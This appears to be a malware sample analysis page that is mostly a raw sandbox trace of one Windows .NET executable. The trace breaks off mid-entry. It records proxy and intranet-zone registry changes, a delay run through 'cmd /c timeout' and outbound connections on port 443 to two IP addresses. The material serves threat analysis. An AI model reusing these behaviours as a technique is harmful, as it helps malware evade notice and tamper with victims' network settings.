样本分析 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb
https://s.threatbook.com/report/file/99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb
09:07:41:671, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_create, C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, parent_pid:7920 cmdline:'C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe' image_base:0x0000000000610000 image_size:0x0000A000 , 0x00000000 [操作成功完成。 ], 09:07:41:686, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\Microsoft.NET\Framework, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:702, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config, offset:0x00000000 datalen:0x00000FFF , 0x00000000 [操作成功完成。 ], 09:07:41:702, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:702, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll.aux, offset:0x00000000 datalen:0x000000B0 , 0x00000000 [操作成功完成。 ], 09:07:41:702, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll, base:0x0000000071D60000 size:0x0140E000 , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config, offset:0x00000000 datalen:0x00000FFF , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll.aux, offset:0x00000000 datalen:0x0000026C , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll, base:0x0000000071270000 size:0x00A55000 , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll.aux, offset:0x00000000 datalen:0x00000360 , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll.aux, offset:0x00000000 datalen:0x00000384 , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll, base:0x0000000070A50000 size:0x00818000 , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll, base:0x0000000070940000 size:0x00106000 , 0x00000000 [操作成功完成。 ], 09:07:41:719, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:734, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll.aux, offset:0x00000000 datalen:0x000002EC , 0x00000000 [操作成功完成。 ], 09:07:41:734, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll, base:0x000000006E430000 size:0x00774000 , 0x00000000 [操作成功完成。 ], 09:07:41:734, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config, offset:0x00000000 datalen:0x00000FFF , 0x00000000 [操作成功完成。 ], 09:07:41:734, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config, offset:0x00000000 datalen:0x00001000 , 0x00000000 [操作成功完成。 ], 09:07:41:749, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:749, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\37c31fb353175d6efd4ca9dc426cab68\System.Windows.Forms.ni.dll.aux, offset:0x00000000 datalen:0x000006B8 , 0x00000000 [操作成功完成。 ], 09:07:41:749, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\59978a45568399ef08cfe99da6a725bb\System.Windows.Forms.ni.dll.aux, offset:0x00000000 datalen:0x000006B8 , 0x00000000 [操作成功完成。 ], 09:07:41:749, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:749, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\37c31fb353175d6efd4ca9dc426cab68\System.Windows.Forms.ni.dll.aux, offset:0x00000000 datalen:0x000006B8 , 0x00000000 [操作成功完成。 ], 09:07:41:749, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\59978a45568399ef08cfe99da6a725bb\System.Windows.Forms.ni.dll.aux, offset:0x00000000 datalen:0x000006B8 , 0x00000000 [操作成功完成。 ], 09:07:41:796, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\Desktop\desktop.ini, offset:0x00000000 datalen:0x0000011C , 0x00000000 [操作成功完成。 ], 09:07:41:796, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\Documents\desktop.ini, offset:0x00000000 datalen:0x00000194 , 0x00000000 [操作成功完成。 ], 09:07:41:796, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\Music\desktop.ini, offset:0x00000000 datalen:0x000001FA , 0x00000000 [操作成功完成。 ], 09:07:41:811, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\Pictures\desktop.ini, offset:0x00000000 datalen:0x000001FA , 0x00000000 [操作成功完成。 ], 09:07:41:811, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\Videos\desktop.ini, offset:0x00000000 datalen:0x000001FA , 0x00000000 [操作成功完成。 ], 09:07:41:811, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\Downloads\desktop.ini, offset:0x00000000 datalen:0x0000011C , 0x00000000 [操作成功完成。 ], 09:07:41:811, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Users\bonelee\OneDrive\desktop.ini, offset:0x00000000 datalen:0x00000064 , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:827, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:858, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:8504, 4092, FILE_read, C:\Windows\SysWOW64\cmd.exe, offset:0x00000000 datalen:0x00039A00 , 0x00000000 [操作成功完成。 ], 09:07:41:858, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, PROC_exec, C:\Windows\SysWOW64\cmd.exe, target_pid:6308 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' , 0x00000000 [操作成功完成。 ], 09:07:41:858, cmd.exe, 6308:0, 4092, EXEC_create, C:\Windows\SysWOW64\cmd.exe, parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' image_base:0x0000000000FE0000 image_size:0x00059000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, cmd.exe, 6308:5100, 4092, FILE_read, C:\Windows\System32\conhost.exe, offset:0x00000000 datalen:0x000C8C00 , 0x00000000 [操作成功完成。 ], 09:07:41:858, cmd.exe, 6308:0, 4092, PROC_exec, C:\Windows\System32\conhost.exe, target_pid:6580 cmdline:'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1' , 0x00000000 [操作成功完成。 ], 09:07:41:858, cmd.exe, 6308:5100, 4092, REG_setval, HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-2451103786-187343032-3810694054-1000\\Device\HarddiskVolume3\Windows\System32\conhost.exe, type:0x00000003 datalen:24 data:'C9 2F 5F 60 DE DA D9 01 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:0, 4092, EXEC_create, C:\Windows\System32\conhost.exe, parent_pid:6308 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' image_base:0x00007FF6131A0000 image_size:0x000D1000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:5780, 4092, FILE_read, C:\Windows\Prefetch\CONHOST.EXE-0C6456FB.pf, offset:0x00000000 datalen:0x00001E40 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\ntdll.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\conhost.exe, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\kernel32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\KernelBase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\locale.nls, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\msvcp_win.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\ucrtbase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\SHCore.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\msvcrt.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\rpcrt4.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\combase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\bcryptprimitives.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\advapi32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\sechost.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\user32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\win32u.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\gdi32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\gdi32full.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\imm32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\Conhost.exe.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\shell32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\cfgmgr32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\windows.storage.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\profapi.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\powrprof.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\shlwapi.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\kernel.appcore.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\cryptsp.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:858, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\Globalization\Sorting\SortDefault.nls, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:874, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\user32.dll.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:874, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\msctf.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:874, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\oleaut32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:874, conhost.exe, 6580:232, 4092, FILE_chmod, C:\Windows\System32\ole32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:41:921, conhost.exe, 6580:7656, 4092, FILE_read, C:\Windows\Fonts\StaticCache.dat, offset:0x00000000 datalen:0x0000003C , 0x00000000 [操作成功完成。 ], 09:07:41:936, conhost.exe, 6580:0, 4092, EXEC_module_load, C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_05b6437c071e554b\comctl32.dll, base:0x00007FFA14440000 size:0x00279000 , 0x00000000 [操作成功完成。 ], 09:07:41:936, cmd.exe, 6308:5100, 4092, FILE_read, C:\Windows\SysWOW64\timeout.exe, offset:0x00000000 datalen:0x00006200 , 0x00000000 [操作成功完成。 ], 09:07:41:936, cmd.exe, 6308:0, 4092, PROC_exec, C:\Windows\SysWOW64\timeout.exe, target_pid:8672 cmdline:'timeout 4.769' , 0x00000000 [操作成功完成。 ], 09:07:41:952, timeout.exe, 8672:0, 4092, EXEC_create, C:\Windows\SysWOW64\timeout.exe, parent_pid:6308 cmdline:'timeout 4.769' image_base:0x0000000000020000 image_size:0x0000A000 , 0x00000000 [操作成功完成。 ], 09:07:41:968, timeout.exe, 8672:0, 4092, EXEC_destroy, C:\Windows\SysWOW64\timeout.exe, parent_pid:6308 cmdline:'timeout 4.769' , 0x00000000 [操作成功完成。 ], 09:07:41:968, cmd.exe, 6308:0, 4092, EXEC_destroy, C:\Windows\SysWOW64\cmd.exe, parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' , 0x00000000 [操作成功完成。 ], 09:07:41:968, conhost.exe, 6580:0, 4092, EXEC_destroy, C:\Windows\System32\conhost.exe, parent_pid:6308 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' , 0x00000000 [操作成功完成。 ], 09:07:41:968, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:968, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\167c4b04ac34ab24a58f841c21862a3e\System.Drawing.ni.dll.aux, offset:0x00000000 datalen:0x00000248 , 0x00000000 [操作成功完成。 ], 09:07:41:968, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\67e34187cff6cf0d7e49a0b354229d26\System.Drawing.ni.dll.aux, offset:0x00000000 datalen:0x00000248 , 0x00000000 [操作成功完成。 ], 09:07:41:968, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:41:968, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\167c4b04ac34ab24a58f841c21862a3e\System.Drawing.ni.dll.aux, offset:0x00000000 datalen:0x00000248 , 0x00000000 [操作成功完成。 ], 09:07:41:968, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\67e34187cff6cf0d7e49a0b354229d26\System.Drawing.ni.dll.aux, offset:0x00000000 datalen:0x00000248 , 0x00000000 [操作成功完成。 ], 09:07:42:046, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_module_load, C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll, base:0x000000006FF10000 size:0x0008E000 , 0x00000000 [操作成功完成。 ], 09:07:42:061, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:42:061, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\bac1ef140124369de2a7efb857ab6349\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C , 0x00000000 [操作成功完成。 ], 09:07:42:061, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\e3c0ae9a32f7a39d7afc41a8aa847174\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C , 0x00000000 [操作成功完成。 ], 09:07:42:061, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:42:061, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\bac1ef140124369de2a7efb857ab6349\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C , 0x00000000 [操作成功完成。 ], 09:07:42:061, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\e3c0ae9a32f7a39d7afc41a8aa847174\Accessibility.ni.dll.aux, offset:0x00000000 datalen:0x0000012C , 0x00000000 [操作成功完成。 ], 09:07:42:608, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, NET_connect, 104.18.19.73:443, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ], 09:07:43:641, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, NET_connect, 104.18.18.73:443, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ], 09:07:44:659, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:44:659, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:44:659, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:44:705, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll, offset:0x00000000 datalen:0x00001000 , 0x00000000 [操作成功完成。 ], 09:07:44:705, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, 